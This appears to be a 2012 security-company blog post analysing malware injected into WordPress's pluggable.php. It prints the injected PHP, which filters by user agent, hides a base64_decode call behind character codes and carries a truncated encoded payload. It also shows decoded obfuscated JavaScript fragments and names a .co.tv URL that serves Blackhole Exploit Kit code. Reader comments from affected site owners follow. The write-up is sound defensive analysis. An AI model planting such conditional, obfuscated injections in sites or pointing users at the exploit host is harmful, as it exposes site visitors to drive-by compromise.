The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is not a WordPress vulnerability, WordPress is simply being targeted as the host.
This malware is not new and we have been seeing variations of it since June, 2012. However, for the last few days the number of sites compromised have multiplied, prompting this post.
We are still tracking down how the sites are getting hacked, but so far we noticed a few similarities between them.
What’s Happening?
This is what gets added to pluggable.php typically at line 810-811:
$__name = “RANDOMMD5”;
if(1>0 AND !preg_match(“#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i”, $_SERVER[“HTTP_USER_AGENT”]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$date = date(“D, j M Y 00:00:00″, time()+60*60*24*30);
$cookie = time().”.”.rand(1111111, 9999999);
echo “<script type=”text/javascript”>document.cookie = “”.$__name.”=”+escape(‘”.$cookie.”‘)+”; expires=”.$date.”; path=/”;”;
$__f = implode(“”, array_map(“chr”, explode(” “, “98 97 115 101 54 52 95 100 101 99 111 100 101”)));
echo $__f(“PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..
If you are not familiar with PHP, this is conditional malware. The code checks the browser of the person visiting the site, and only displays if a few conditions are met: Browser (user agent) must not be Opera, Chrome, or Firefox 3, and traffic should not originate from a search engine (Google, Yahoo, etc).
Decode and Analyze
When you look at all the exclusions, it seems the malware is focusing on Windows users running Internet Explorer, or new versions of Firefox. After decoding the malware, we understand why. The following javaScript is executed in the browser:
<script type=”text/javascript”>document.cookie = “db6c..eed1f235454f7
=”+escape(‘123.456’)+”; expires=Fri, 14 Sep 2012 00:00:00; path=/”..
<script type=”text/javascript”>pal=0; pal-=5884; his=0.0034;his–;wax=7474;i
f(wax>0.0101){was=0.0106;cap=0.0359;if(cap<7740){hon=7;hon++}}kue=23;if..
This is fully random and changes per site. Often the payload starts as:
kos=26; kos+=8147;zag=2832;pic=17;pic++;ins=..
or
ama=0.001; if(ama>0){you=7336;you-=7397;chi=11;chi++}dun=0.035;dun–;pah=2404;pah–;
or
vac=0.0012;if(vac==0.0075){irk=null}foy=null;kop=9;kop+=17;bid=sea
Where’s it start
There are many other variations. Once decoded it attempts to load additional exploit code from:
http://qckdqxeu.co.tv/ckp2wnzxwiwrq41
From there it tries to exploit the user using the Blackhole Exploit Kit. Be advised that there are other domains in the .co.tv TLD doing the same thing, it is not limited to the one we’re pointing out. More to come on that!
This exploit kit focuses on Windows vulnerabilities, and it also shows a slight increase on the AVG Threat Labs page for the Phoenix Exploit Kit.
As always, we will post more details when we have it.
Denis Sinegubko
Yuliyan Tsvetkov
Krasimir Konov
Ben Martin
Justin Channell
3 comments
Thanks so much for the post!! Any word on how it’s getting in? I’ve cleaned out my files twice, changed all passwords, and made sure everything was up to date…and it’s back. It keeps adding a random 32 string file to my root as well as base 64 code to the index files.
i really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT,being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course i was looking for such information online to assist me on php and mysql and your information helped me a lot. Thanks.
My pluggable.php files are being compromised this week across 10 sites
on my server — and I don’t know what to do! Any help you can provide?!
Comments are closed.